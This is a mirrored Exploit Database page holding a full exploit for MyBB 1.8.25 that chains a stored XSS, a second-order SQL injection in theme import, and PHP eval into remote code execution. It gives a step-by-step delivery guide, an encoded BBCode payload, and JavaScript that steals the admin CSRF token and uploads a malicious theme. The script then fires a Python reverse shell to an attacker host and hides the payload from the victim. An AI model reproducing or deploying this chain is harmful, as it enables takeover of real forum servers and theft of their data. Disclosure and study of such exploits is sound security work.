MyBB 1.8.25 – Chained Remote Command Execution

• Exploit Database
• 111 阅读

• 作者： SivertPL
  日期： 2021-03-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49696/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224

  # Exploit Title: MyBB 1.8.25 - Chained Remote Command Execution # Exploit Author: SivertPL (kroppoloe@protonmail.ch) # Date: 19.03.2021 # Description: Nested autourl Stored XSS -> templateset second order SQL Injection leading to RCE through improper string interpolation in eval(). # Software Link: https://resources.mybb.com/downloads/mybb_1825.zip # CVE: CVE-2021-27889, CVE-2021-27890   # Reference: https://portswigger.net/daily-swig/chained-vulnerabilities-used-to-take-control-of-mybb-forums # The exploit requires the target administrator to have a valid ACP session. # Proof of Concept Video: https://www.youtube.com/watch?v=xU1Y9_bgoFQ # Guide:   1) In order to escape various checks, the XSS has to download this .js file from an external server, and then execute it.   Please replace the source of the following script node with an URL pointing to the second stage .js file (this file) to be downloaded by the target.   document.write(&apos;<script src=http://localhost:8000/second_stage.js></script>&apos;);   2) Please encode the aforementioned JS payload with String.fromCharCode, to achieve constraint-less JavaScript execution environment.   You can use this website: https://eve.gd/2007/05/23/string-fromcharcode-encoder/   3) Put the resulting encoded payload in the nested autourl vulnerability vector:   [img]http://xyzsomething.com/image?)http://x.com/onerror=<FCC ENCODED PAYLOAD>;//[/img]   4) The final payload should look like this:   [img]http://xyzsomething.com/image?)http://x.com/onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,58,56,48,48,48,47,119,111,114,109,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41,59));//[/img]   5) Send the full vector to the target, either by private message, a post, or any other place where MyCode (BBCode) is supported. Once the target&apos;s browser renders the page, the XSS vulnerability will fire and download & execute the second stage payload from the website specified above, using document.write() to &apos;bypass&apos; SOP.   After the execution of the payload, you should receive a reverse shell, provided the admin has a valid ACP session.   6) Enjoy your RCE! For educational purposes only.     const REVERSE_SHELL_IP = "localhost"; const REVERSE_SHELL_PORT = 5554;   const PAYLOAD_XML_NAME = "payload"; const PAYLOAD_XML_VERSION = "1821";   const XML_PROLOG = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>";   const SHELL_PAYLOAD = "python -c &apos;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + REVERSE_SHELL_IP + "\"," + REVERSE_SHELL_PORT + "));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);&apos;" const SQL_PAYLOAD = "&apos;) AND 1=0 UNION SELECT title, &apos;${passthru(base64_decode(\\&apos;" + btoa(SHELL_PAYLOAD) + "\\&apos;))}&apos; from mybb_templates -- ";     // Trigger the actual vulnerability, force cache reload. // Stage: Final function trigger() { var request = new XMLHttpRequest();   request.open(&apos;GET&apos;, &apos;/index.php&apos;); request.send(); }     // Poison the cache. // Stage: 6 function set_as_default(token, tid) {   var request = new XMLHttpRequest();   request.open(&apos;GET&apos;, &apos;/admin/index.php?module=style-themes&action=set_default&tid=&apos; + tid + &apos;&my_post_key=&apos; + token);   request.onload = function() { trigger(); };   request.send(); }   // Get the TID of the downloaded theme payload // Stage: 5 function get_payload_tid(token) { var request = new XMLHttpRequest();   request.open(&apos;GET&apos;, &apos;/admin/index.php?module=style-themes&apos;);   request.responseType = "document";   request.onload = function() {   var response = request.response;   var aTags = response.getElementsByTagName("a"); var searchText = "payload"; var found;   for (var i = 0; i < aTags.length; i++) { if (aTags[i].textContent == searchText) { found = aTags[i]; break; } }   var href = found.getAttribute("href");   var urlParams = new URLSearchParams(href);   var tid = urlParams.get("tid");     set_as_default(token, tid); };   request.send();   }     // We pass the actual request to upload the template exploiting the second link of the exploit chain // Stage: 4 function upload_template(token) {   var request = new XMLHttpRequest();   request.open(&apos;POST&apos;, &apos;/admin/index.php?module=style-themes&action=import&apos;);   var data = new FormData();   data.append(&apos;my_post_key&apos;, token); data.append(&apos;local_file&apos;, build_payload(), PAYLOAD_XML_NAME + ".xml"); data.append(&apos;import&apos;, 0); data.append(&apos;url&apos;, &apos;&apos;); data.append(&apos;tid&apos;, &apos;1&apos;); data.append(&apos;name&apos;, "payload"); data.append("version_compat", 1); data.append("import_stylesheets", 1); data.append("import_templates", 1);   request.onload = function() { // After uploading the template, set it as default to poison the cache get_payload_tid(token) };     request.send(data); }     // Build the rogue XML Template exploiting SQL Injection leading to RCE through PHP evaluation. // Stage: 3 function build_payload() { var xmlDom = document.implementation.createDocument("", "", null);   var theme = xmlDom.createElement("theme"); theme.setAttribute("name", PAYLOAD_XML_NAME); theme.setAttribute("version", PAYLOAD_XML_VERSION);   var properties = xmlDom.createElement("properties"); theme.appendChild(properties);   var template_set = xmlDom.createElement("templateset"); template_set.innerHTML = SQL_PAYLOAD; properties.appendChild(template_set);   xmlDom.appendChild(theme);   var serialized = new XMLSerializer().serializeToString(xmlDom);   var result = XML_PROLOG + serialized; var file = new File([result], PAYLOAD_XML_NAME);   return file; }     // Acquire the anti-CSRF token // Stage: 2 function acquire_token(request) {   var response = request.response; var token = response.getElementsByName("my_post_key")[0].value;   if(token == null) { /* ACP Session either expired or wasn&apos;t established to begin with */ return; }   // We have acquired the anti-CSRF token now. upload_template(token); }     // ACP Code Execution // Stage: 1 function exec_acp() {   var request = new XMLHttpRequest();   request.open(&apos;GET&apos;, &apos;admin/index.php?module=style-themes&action=import&apos;); request.responseType = "document";   request.onload = function() { acquire_token(request); };   request.send(); }     // We hide the payload, to raise less suspicions // Stage: 0 function hide() {   var getAll = document.querySelectorAll("[src*=&apos;http://xyzsomething.com/image?)<a href=&apos;https://www.exploit-db.com/exploits/49696/]");   getAll.forEach(element => { var pNode = element.parentNode.innerText="lmao whatever you say"; });   }   // Entry point of the exploit function start() { hide(); exec_acp(); }     start();